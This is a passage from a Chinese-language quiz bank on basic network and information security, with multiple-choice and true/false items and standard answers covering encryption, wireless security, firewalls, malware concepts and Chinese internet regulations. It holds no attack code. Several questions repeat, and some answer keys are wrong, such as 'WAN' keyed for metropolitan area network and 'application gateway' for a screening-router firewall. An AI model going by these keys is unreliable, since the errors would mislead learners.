D、 /etc/shadow和/etc/login

您的答案: 标准答案: A

10、在信息系统安全中,风险由( )两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

您的答案: 标准答案: C

11、Windows系统中权限最高为( )。

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

12、Windows紧急修复盘不能修复下列哪个项目( )。

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

13、Windows系统中“net share”命令的作用是( )。

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

您的答案: 标准答案: A

14、 Windows平台的可执行文件格式是( )。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

15、网络安全中的CIA三元组指的是( )。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

您的答案: 标准答案: A

16、信息安全的目标之一是确保数据对授权用户是可访问的,也称作( )目标。

A、 可用性

B、 完整性

C、 机密性

D、 机密性、完整性、和可用性

您的答案: 标准答案: A

17、以通过发现漏洞来提升安全性为目标的黑客,被称作( )。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

18、在网络攻击的典型步骤中,攻击者在探查计算机或网络信息后,下一步将( )。

A、 修改网络安全配置

B、 穿透网络安全防护

C、 瘫痪网络和设备

D、 迂回到其他系统

您的答案: 标准答案: B

19、从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用( )来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

您的答案: 标准答案: D

20、( )是一个计算机程序或一个程序的一部分,它平时保持休眠直到被特定的逻辑事件触发。

A、 逻辑炸弹

B、 触发器

C、 蠕虫

D、 病毒

您的答案: 标准答案: A

21、当成百上千计算机被远程控制时就形成了( )。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

22、( )被用于将文本、图像、音频和视频合并到一个单一文档中。

A、 TCP/IP

B、 HTML

C、 HTTP

D、 HSL

您的答案: 标准答案: B

23、现代计算机的基本输入输出系统(BIOS)存储在( )芯片上。

A、 银闪存

B、 基本输出/输入

C、 可编程只读存储器

D、 只读存储器

您的答案: 标准答案: C

24、RAID1 是一种( )的磁盘镜像技术。

A、 从磁盘读取数据两次

B、 数据写到多磁盘

C、 刷BIOS

D、 降低可靠性

您的答案: 标准答案: B

25、Cookie( )。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

您的答案: 标准答案: C

26、关于键盘记录器,下列选项中除( )以外都是正确的。

A、 它可能是插在键盘连接器和计算机键盘端口之间的一个小设备

B、 它只搜集在网站上输入的信息

C、 击键记录被其搜集并存储为文档

D、 软件键盘记录器通常作为木马被下载和安装

您的答案: 标准答案: B

27、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为_( )。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

您的答案: 标准答案: B

28、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示( )。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

29、程序和数据能够存储于其上的集中式网络计算机,称作( )。

A、 服务器

B、 客户端

C、 Web代理

D、 网络设备认证

您的答案: 标准答案: A

30、IP地址的一个例子是( )。

A、 $800922$9988

B、 14102009

C、 00:15:59:3B:30:C3

D、 192.168.11.100

您的答案: 标准答案: D

31、城域网又称为( )。

A、 WAN

B、 LAN

C、 PAN

D、 WPAN

您的答案: 标准答案: A

32、用户为了( )可以允许网络上的其他用户查看目录内容。

A、 文本传递

B、 网络认证

C、 目录分发

D、 文件共享

您的答案: 标准答案: D

33、对WiFi信号进行沿街扫描,不需要使用( )。

A、 USB无线网卡

B、 全方向天线

C、 移动计算机设备

D、 音频喇叭

您的答案: 标准答案: D

34、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是( )

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

您的答案: 标准答案: B

35、在网络寻址过程中,将目标设备IP翻译为MAC地址的协议是( )

A、 ICMP

B、 DNS

C、 SNMP

D、 ARP

您的答案: 标准答案: D

36、信息安全管理最关注的是( )

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

您的答案: 标准答案: C

37、在需要保护的信息资产中( )是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

38、美国国防部在他们公布的可信计算机系统评价标准中,将计算机系统的安全级别分为四类七个安全级别,其中描述不正确的是( )

A、 A类的安全级别比B类高

B、 C1类的安全级别比C2类要高

C、 随着安全级别的提高,系统的可恢复性就越高

D、 随着安全级别的提高,系统的可信度就越高

您的答案: 标准答案: B

39、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

40、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

41、 数字信封技术能够( )

A、 对发送者和接受者的身份进行认证

B、 对发送者的身份进行认证

C、 防止交易中的抵赖发生

D、 保证数据在传输过程中的安全性

您的答案: 标准答案: D

42、 防止用户被冒名所欺骗的方法是( )。

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

您的答案: 标准答案: A

43、下列概念中,不能用于身份认证的手段是( )。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软

D、 智能卡

您的答案: 标准答案: C

44、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于( )。

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

您的答案: 标准答案: D

45、提供证据表明用户身份真实性的过程称作( )。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

您的答案: 标准答案: D

46、将要输入到算法中进行加密的数据称作( )。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

您的答案: 标准答案: D

47、下列关于预防网络攻击的说法正确的是( )

A、 现代服务器和 PC 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是采用防火墙设备。

您的答案: 标准答案: C

48、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码。

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

49、PDRR一般是指信息安全保障中的( )等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

您的答案: 标准答案: D

50、PING命令使用ICMP的哪一种code类型:( )

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

您的答案: 标准答案: B

1、如果想要限制用户过多的占用磁盘空间,应当( )

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

2、关于代理服务说法正确的是( )

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

您的答案: 标准答案: A

3、代理服务( )

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

您的答案: 标准答案: B

4、 Ipsec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

您的答案: 标准答案: D

5、小张经常出差,要在外地访问公司的财务信息系统,他应该采用的安全、廉价的通讯方式是( )

A、 PPP连接到公司的RAS服务器上。

B、 远程访问VPN

C、 电子邮件

D、 与财务系统的服务器PPP连接。

您的答案: 标准答案: B

6、 HTTP是( )。

A、 WWW协议

B、 文件传输协议

C、 信息浏览协议

D、 超文本传输协议

您的答案: 标准答案: D

7、SSL指的是( )

A、 加密认证协议

B、 安全套接层协议

C、 授权认证协议

D、 安全通道协议

您的答案: 标准答案: B

8、当无线路由器wifi密码安全类型为( ),最容易破解。

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

9、最低效的口令攻击类型是( )。

A、 暴力破解攻击

B、 字典攻击

C、 彩虹表攻击

D、 机器攻击

您的答案: 标准答案: A

10、无线路由器支持WEP、WPA、WPA2等方式的加密功能,它们的安全强度顺序为( )。

A、 WPA2>WPA>WEP

B、 WEP>WPA>WPA2

C、 WEP>WPA2>WPA

D、 都相同

您的答案: 标准答案: A

11、SSID(Service Set Identifier)( )。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

您的答案: 标准答案: A

12、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是( )。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

您的答案: 标准答案: A

13、保护无线网络的第一步是( )。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

您的答案: 标准答案: A

14、将单位内部的局域网接入Internet(因特网)所需使用的接入设备是( )。

A、 防火墙

B、 集线器

C、 路由器

D、 中继转发器

您的答案: 标准答案: C

15、垃圾邮件过滤器( )。

A、 可由互联网服务提供商使用来拦截消息

B、 只能由本地电子邮件客户端使用

C、 要求同时创建黑名单和白名单

D、 只能被POP3服务器使用

您的答案: 标准答案: A

16、来自于多个攻击源而不是单一攻击源的攻击,称作( )攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

您的答案: 标准答案: A

17、下列哪个 IPv4 地址代表子网的广播地址( )

A、 172.16.4.129 /26

B、 172.16.4.191 /26

C、 172.16.4.51 /27

D、 172.16.4.221 /27

您的答案: 标准答案: B

18、可以被数据完整性机制防止的攻击方式是( )。

A、 假冒源地址或用户的地址欺骗攻击

B、 抵赖做过信息的递交行为

C、 数据中途被攻击者窃听获取

D、 数据在途中被攻击者篡改或破坏

您的答案: 标准答案: D

19、黑客利用IP地址进行攻击的方法有( )

A、 IP欺骗

B、 解密

C、 窃取口令

D、 发送病毒

您的答案: 标准答案: A

20、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是( )。

A、 传输层

B、 表示层

C、 会话层

D、 应用层

您的答案: 标准答案: C

21、操作系统经常需要进行补丁升级,在进行补丁升级时通常需要管理员权限,因此在使用电脑的过程中,我们应该尽可能地使用管理员帐户登录系统进行日常操作。 ( )

A、 对

B、 错

您的答案: 标准答案: B

22、网络管理的功能有( )。

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

您的答案: 标准答案: D

23、如果想要限制用户过多的占用磁盘空间,应当( )。

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

24、在需要保护的信息资产中( )是最重要的。

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

25、让攻击者“进不来”“拿不走”“看不懂”“改不了”“走不脱”是网络信息安全建设的目的。其中,“看不懂”是指( )安全服务。

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

您的答案: 标准答案: A

26、“计算机可能被盗”是( )的一个例子。

A、 漏洞利用

B、 漏洞

C、 资产

D、 风险

您的答案: 标准答案: D

27、关于临时互联网文件目录,下述说法中除( )以外都是正确的。

A、 是浏览器首先检查是否已经存储了HTML文档的位置

B、 是存储特殊加密文件的地方

C、 应该定期删除

D、 永远不应该删除

您的答案: 标准答案: D

28、除个人计算机里文件的共享功能,可以( )。

A、 将文件加密

B、 将计算机80端口封闭

C、 将计算机里的Server服务关闭

D、 将计算机里的System进程关闭

您的答案: 标准答案: C

29、小王是网管,为了监听攻击效果最好,监听设备不应放在( ) 。

A、 网关

B、 路由器

C、 中继器

D、 防火墙

您的答案: 标准答案: C

30、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是( )。

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat–ano

您的答案: 标准答案: D

31、下列选项中除( )以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

您的答案: 标准答案: A

32、下列选项中,除( )以外都可能是身份盗用行为。

A、 制作假支票或借记卡,从银行账户中转走所有的钱

B、 以受害人的名字来申请破产,以逃避债务

C、 以用户的名字开设银行账户,并利用该账户开不良支票

D、 向网上银行账户系统发送蠕虫

您的答案: 标准答案: D

33、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

您的答案: 标准答案: A

34、( )用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

您的答案: 标准答案: B

35、社会工程是指需要整个社会共同关注、共同努力、能对整个社会的产生积极影响的重大规划和项目,譬如全社会网络用户上网安全意识的培训。 ( )

A、 对

B、 错

您的答案: 标准答案: B

36、( )是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

您的答案: 标准答案: D

37、还未公开的漏洞,称作( )漏洞?

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

您的答案: 标准答案: D

38、用于修复软件发布之后所发现漏洞的安全更新,称作( )。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

您的答案: 标准答案: D

39、攻击者使用( )技术在被攻击主机内存中插入一个新的“返回地址”,并使其指向包含攻击者提供的恶意代码的内存区地址。

A、 缓冲区溢出攻击

B、 木马攻击

C、 文件上传攻击

D、 蠕虫攻击

您的答案: 标准答案: A

40、下列关于超链接的说法除( )以外都是正确的。

A、 经常可以在电子邮件消息中发现

B、 他们可能显示的不是真实的链接目标

C、 已经很少使用了

D、 需要用户点击才能启动

您的答案: 标准答案: C

41、( )是指有能力带来威胁的人或事物。

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

您的答案: 标准答案: B

42、( )操作可能会威胁到智能手机的安全性。

A、 越狱

B、 Root

C、 安装来自第三方市场的软件

D、 以上都是

您的答案: 标准答案: D

43、 将U盘插入到在公用电脑上,当电脑检测到U盘之后迅速按照正常程序卸载并弹出U盘,该操作过程是不会导致U盘中涉密文件泄密的。 ( )

A、 对

B、 错

您的答案: 标准答案: B

44、下列关于Android的描述正确的是( )。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

您的答案: 标准答案: B

45、木马程序通常是恶意攻击者入侵到我们的电脑之后植入的,很少因为用户自己的原因导致木马植入。( )

A、 对

B、 错

您的答案: 标准答案: B

46、绿色上网软件可以自动过滤或屏蔽互联网上的( )保护青少年健康成长。

A、 网络游戏

B、 网络聊天信息

C、 淫秽色情信息

D、 好莱坞等电影大片

您的答案: 标准答案: C

47、数据文件不具有可执行性的特点,因此在一台干净的计算机上仅仅打开一个外来的数据文件(如Word文档、Pdf文档等)是不可能导致该计算机被感染病毒的。 ( )

A、 对

B、 错

您的答案: 标准答案: B

48、网络视频聊天相对于文字聊天而言具有较高的安全性,因为网络视频聊天是面对面的交流,是不可伪造的。但视频聊天却具有众多安全隐患,譬如可能被人录像等。( )

A、 对

B、 错

您的答案: 标准答案: B

49、“联网计算机不涉密,涉密计算机不联网”是指,计算机在上网的时候不能查看涉密信息,计算机涉密的时候不能连接互联网。( )

A、 对

B、 错

您的答案: 标准答案: B

50、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为( )。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

您的答案: 标准答案: A

1、在iPhone安装新浪微博客户端,正确的做法是( )。

A、 进入【App Store】,搜索“新浪微博”,然后安装

B、 下载“新浪微博”程序,使用数据线拷贝到iPhone上,然后安装

C、 直接将互联网上下载的“新浪微博”程序拷贝到iPhone即可

D、 以上都不对

您的答案: 标准答案: A

2、Rootkit的主要目标是( )。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

您的答案: 标准答案: A

3、Cookie______。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

您的答案: 标准答案: C

4、用于修复软件发布之后所发现漏洞的安全更新,称作______。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

您的答案: 标准答案: D

5、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作______。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

您的答案: 标准答案: A

6、病毒通常修改目标程序的()字段达到获得控制权的目的。

A、 ImageBase

B、 PointerToRawData

C、 PointerToSymbleTable

D、 AddressOfEntryPoint

您的答案: 标准答案: D

7、在以下反病毒对抗技术中,________技术是目前绝大部分反病毒软件必须具备的最核心的技术之一。

A、 特征码检测

B、 启发式扫描

C、 虚拟机

D、 主动防御

您的答案: 标准答案: A

8、远程控制型木马与远程管理软件之间的最大区别在于_________。

A、 是否可以传播

B、 是否存在变种

C、 是否为独立的程序

D、 是否获得被控制端授权

您的答案: 标准答案: D

9、熊猫烧香病毒采用了捆绑式感染,其缺陷是被感染程序的图标会发生变化。如果让被感染程序的图标保持不变,则需要修改目标程序的()。

A、 代码节

B、 数据节

C、 资源节

D、 图标节

您的答案: 标准答案: C

10、中央提出要大力培育____ 的“四有”中国好网民。 1.有高度的安全意识 2.有文明的网络素养 3.有守法的行为习惯 4.有必备的防护技能 5.有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

您的答案: 标准答案: B

11、在服务器出现故障时进行接管的服务器称作______。

A、 故障保护服务器

B、 回滚服务器

C、 对称服务器集群

D、 非对称服务器集群

您的答案: 标准答案: A

12、从本质上讲,计算机病毒是一种( )。

A、 细菌

B、 文本

C、 程序

D、 微生物

您的答案: 标准答案: C

13、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为______。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

您的答案: 标准答案: B

14、《全国青少年网络文明公约》内容包括____。 1.要善于网上学习,不浏览不良信息。 2.要诚实友好交流,不侮辱欺诈他人。 3.要增强自护意识,不随意约会网友。 4.要维护网络安全,不破坏网络秩序。

A、 2345

B、 1245

C、 1235

D、 12345

您的答案: 标准答案: D

15、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于______

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

您的答案: 标准答案: D

16、下列选项中除______以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

您的答案: 标准答案: A

17、 根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

您的答案: 标准答案: C

18、靠欺骗别人来获得安全敏感信息的方式被称作______。

A、 社会工程学

B、 魔法攻击

C、 暴力破解攻击

D、 诡计攻击

您的答案: 标准答案: A

19、根据《互联网上网服务营业场所管理条例》规定,中学、小学校园周围________米范围内和居民住宅楼(院)内不得设立互联网上网服务营业场所。

A、 200

B、 300

C、 500

D、 1000

您的答案: 标准答案: A

20、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

您的答案: 标准答案: C

21、遇到不良信息,可以到下列选项中除________以外的网站进行举报。

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

您的答案: 标准答案: D

22、列选项中不属于垃圾邮件过滤技术的是______。

A、 软件模拟技术

B、 贝叶斯过滤技术

C、 关键字过滤技术

D、 黑名单技术

您的答案: 标准答案: A

23、 对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

您的答案: 标准答案: D

24、对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

您的答案: 标准答案: D

25、将要输入到算法中进行加密的数据称作______。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

您的答案: 标准答案: D

26、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为______。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

您的答案: 标准答案: A

27、撞库得手的原因是______。

A、 用户扫描不安全的二维码

B、 用户为图省事,在许多网站设置相同的用户名和口令

C、 用户电脑被植入木马

D、 用户连接不安全的无线网络导致

您的答案: 标准答案: B

28、在Windows系统中下列账户不是合法账户的是______

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

您的答案: 标准答案: D

29、______是位于安全网络边界之外的一个隔离网络。

A、 非军事区

B、 端口复制区

C、 安全网络环境

D、 防火墙沙盒

您的答案: 标准答案: A

30、网络礼仪的黄金规则是______。

A、 记住人的存在

B、 永远不惹怒朋友

C、 遵守所有其它的网络礼仪规则

D、 每条消息都包含一个笑脸

您的答案: 标准答案: A

31、根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

您的答案: 标准答案: C

32、国家级网络安全青少年科普基地位于 ______。

A、 中国科技馆

B、 国家图书馆

C、 西单电影院

D、 首都博物馆

您的答案: 标准答案: A

33、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

您的答案: 标准答案: C

34、遇到不良信息,可以到下列选项中除________以外的网站进行举报

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

您的答案: 标准答案: D

35、《文明上网自律公约》内容包括________。 ①自觉遵纪守法,倡导社会公德,促进绿色网络建设; ②提倡自主创新,摒弃盗版剽窃,促进网络应用繁荣; ③提倡诚实守信,摒弃弄虚作假,促进网络安全可信; ④提倡人人受益,消除数字鸿沟,促进信息资源共享。

A、 ②③④

B、 ①②④

C、 ①②③

D、 ①②③④

您的答案: 标准答案: D

36、《全国青少年网络文明公约》内容包括____。 ①要善于网上学习,不浏览不良信息。 ②要诚实友好交流,不侮辱欺诈他人。 ③要增强自护意识,不随意约会网友。 ④要维护网络安全,不破坏网络秩序。 ○5要有益身心健康,不沉溺虚拟时空。

A、 2345

B、 1245

C、 1235

D、 12345

您的答案: 标准答案: D

37、中央提出要大力培育____ 的“四有”中国好网民。 ○1有高度的安全意识 ○2有文明的网络素养 ○3有守法的行为习惯 ○4有必备的防护技能 ○5有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

您的答案: 标准答案: B

38、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是______

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

您的答案: 标准答案: B

39、Windows系统中“net share”命令的作用是( )

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

您的答案: 标准答案: A

40、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是(

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

您的答案: 标准答案: D

41、个人移动终端的数据保护策略,除了数据加密还有( )

A、 移动终端的数据备份与还原

B、 使用安全的无线接入点

C、 关闭WLAN功能,开启3G/4G功能

D、 不要使自己的移动终端成为WiFi热点

您的答案: 标准答案: A

42、 有一些信息安全事件是由于信息系统中多个部分共同作用造成的,人们称这类事件为“多组件事故”,应对这类安全事件最有效的方法是( )

A、 配置网络入侵检测系统以检测某些类型的违法或误用行为

B、 使用防病毒软件,并且保持更新为最新的病毒特征码

C、 将所有公共访问的服务放在网络非军事区(DMZ)

D、 使用集中的日志审计工具和事件关联分析软件

您的答案: 标准答案: D

43、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

44、WPA2的目的是______。

A、 通过经常修改口令来锁住无线路由器

B、 限制下载量

C、 限制用户传输量

D、 加密传输

您的答案: 标准答案: D

45、SSL协议要求建立在______协议之上。

A、 HTTP

B、 IP

C、 TCP

D、 SMTP

您的答案: 标准答案: C

46、 单位内部做的路由表中元素不包含( )

A、 源IP地址

B、 目的IP地址

C、 子网掩码

D、 下一跳地址

您的答案: 标准答案: A

47、某客户端采用ping命令检测网络连接故障时,发现可以ping通127.0.0.1及本机的IP地址,但无法ping通同一网段内其他工作正常的计算机的IP地址。该客户端的故障可能是( )

A、 TCP/IP协议不能正常工作

B、 本机网卡不能正常工作

C、 本机网络接口故障

D、 DNS服务器地址设置错误

您的答案: 标准答案: C

48、公司需要使用域控制器来管理,安装域控制器须具备

A、 操作系统版本是Windows server2008或者Windows XP

B、 本地磁盘至少有一个NTFS分区

C、 本地磁盘必须全部是NTFS分区

D、 有相应的DNS服务器支持

您的答案: 标准答案: B

49、为了降低分析,不建议使用的Internet服务是(

A、 web服务

B、 外部访问内部系统

C、 内部访问Internet

D、 FTP服务

您的答案: 标准答案: D

50、代理服务是指______

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

您的答案: 标准答案: B

1、关于代理服务说法正确的是______

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

您的答案: 标准答案: A

2、下述关于IPv6论述中不正确的是( )

A、 IPV6具有高效IP包头

B、 IPV6增强了安全性

C、 IPV6地址采用64位

D、 IPV6采用主机地址自动配置

您的答案: 标准答案: C

3、IPSec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

您的答案: 标准答案: D

4、网络地址转换(Network Address Translation,NAT)______。

A、 仅能被用于大型企业网络

B、 因为太复杂所以不能被用于无线网络

C、 将网络设备的地址对攻击者隐藏

D、 提供有限安全性并且已被MAC地址过滤取代

您的答案: 标准答案: C

5、_____是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

您的答案: 标准答案: C

6、 硬件防火墙常见的性能参数不包含( )

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

您的答案: 标准答案: D

7、 通常硬件防火墙设备不包含哪种物理接口( )

A、 以太网电口

B、 SFP/GBIC光接口

C、 Console口

D、 AUX接口

您的答案: 标准答案: D

8、在一个新组建的运行正常的网络中,如果只允许内网的某些客户可以访问互联网,内网的某些服务器可以被互联网上的用户访问,要在网络中再次部署哪种设备( )

A、 防病毒过滤网关

B、 IDS

C、 流量控制设备

D、 防火墙

您的答案: 标准答案: D

9、下列说法中,关于包过滤防火墙和应用层代理防火墙的描述错误的是______。

A、 包过滤防火墙必须和路由器在同一个设备中实现才能够保障安全

B、 应用层代理防火墙能使内网用户访问常用网站的速度加快

C、 包过滤通常在传输层以下实现,应用层代理通常在会话层以上实现

D、 应用层代理防火墙能够提供用户认证

您的答案: 标准答案: A

10、硬件防火墙常见的性能参数不包含______

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

您的答案: 标准答案: D

11、屏蔽路由器型防火墙采用的技术是基于( )

A、 数据包过滤技术

B、 应用网关技术

C、 代理服务技术

D、 三种技术的结合

您的答案: 标准答案: B

12、______可在分组到达网络边界时进行过滤,从而压制网络攻击。

A、 网卡适配器

B、 路由器

C、 防火墙

D、 网络连接存储NAS

您的答案: 标准答案: C

13、当发现网页被篡改或信息系统主机已被入侵,应首先( )

A、 将被攻击设备从网络中隔离出来

B、 立即向信息系统主管部门负责人报告

C、 查看利用了哪些漏洞实施的攻击

D、 立即恢复信息系统的正常使用

您的答案: 标准答案: A

14、小王是公司的网络管理员,为了监听络中存在的攻击,达到最好的监听,监听设备不应放在______

A、 网关

B、 路由器

C、 中继器

